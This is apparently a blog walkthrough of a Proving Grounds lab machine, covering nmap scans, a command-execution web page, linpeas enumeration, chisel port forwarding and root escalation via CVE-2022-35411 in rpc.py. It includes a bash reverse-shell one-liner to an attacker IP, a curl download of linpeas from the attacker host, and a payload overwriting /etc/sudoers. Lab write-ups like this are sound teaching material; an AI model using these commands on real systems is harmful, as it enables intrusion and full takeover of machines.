Easy initial foothold, there is only 1 flag here which is root. For root, check on the service.
Enumeration
sudo nmap -p- $ip -Pn -vv -sS -A --open -T 4 -oN nmap-sS.txt
Port 22 and 8000 opened.
Port 8000
Checking on the port 8000, running http server. Browse the website.
Seems like we can run any command here, if you want, you can get a reverse shell from here. sh -i >& /dev/tcp/$KaliIP/80 0>&1
Since the uid is 1000, and no flag at home directory, I believe that only has 1 flag that belongs to root, hence I decide to enumerate any potential privilege escalation from here.
#transfer linpeas from kali to target machine
#At kali where linpeas.sh located
python3 -m http.server 80
#At target machine
curl http://$KaliIP/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
From the linpeas result, we notice local port 65432 that we did not discover from nmap result.
However we did not know what service it running, we tried to do reverse port forwarding via chisel and use nmap to scan the port, but can’t tell what service it running.
If you are interested in trying out the reverse port forwarding, you can try downloading the chisel here , or you can skip to privilege escalation part. Make sure both machines running the same chisel version. A port forward cheat sheet can be found here. To do the individual port forwarding. Follow below step.
#At kali machine, the --port is for chisel client to connect to chisel server, you may use any port you like
/Path/to/chisel server --reverse --port 51234
#At target machine, we need to transfer the chisel binary file to the target machine
/Path/to/chisel client $KaliIP:51234 R:65432:127.0.0.1:65432
#R:65432 refers to the port you want to bind at kali, and 127.0.0.1:65432 is the local port you wish to forward
#If successfully connected, you should see session created at kali machine
Then you can just run nmap -p 65432 127.0.0.1 -A
to enumerate the port. As per below.
Privilege Escalation
From linpeas result, we also notice root running something unusual.
Why do we say it is unusual?
Because it is located at
/opt
./opt
is intended to hold additional (optional) software and packages that are not part of the default installation.
Let’s check on the rpc.py. We notice it running RPC on the local port 65432. We then google “rpc.py exploit” and found CVE-2022–35411.
Since the rpc.py is run by root, if we can exploit the vulnerability, we can get a root shell.
Checking on the exploit, we need to change the exec_command
to whatever command we want, and run that exploit at the target machine. So I change to exec_command(‘echo “user ALL=(root) NOPASSWD: ALL” > /etc/sudoers’)
You may change to whichever payload you want, like sh -i >& /dev/tcp/$KaliIP/80 0>&1
. Transfer the exploit to the target machine, chmod +x exploit.py and execute it.
Congratz !! Hope you learn something from this walkthrough. Check out my stories for other proving grounds machine walkthroughs. Leave a comment if you found another way to pawn this machine.